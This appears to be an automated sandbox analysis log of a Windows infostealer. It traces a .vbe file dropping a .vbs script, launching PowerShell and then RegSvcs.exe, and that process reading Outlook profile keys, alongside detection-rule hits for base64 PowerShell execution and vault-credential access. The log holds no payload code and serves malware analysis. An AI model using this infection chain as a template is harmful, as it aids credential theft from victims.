Source: amsi64_6804.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBE@14/19@1/3
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2cdss1s.2su.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs"
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: aepic.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00970698 push eax; ret 8_2_00970712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00970698 push eax; ret 8_2_00970722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_009706C8 push eax; ret 8_2_00970702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_009706C8 push eax; ret 8_2_00970712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00970718 push eax; ret 8_2_00970722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00970708 push eax; ret 8_2_00970712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00970728 push eax; ret 8_2_00970732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0604FBCD push es; iretd 8_2_0604FBDC

                  Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
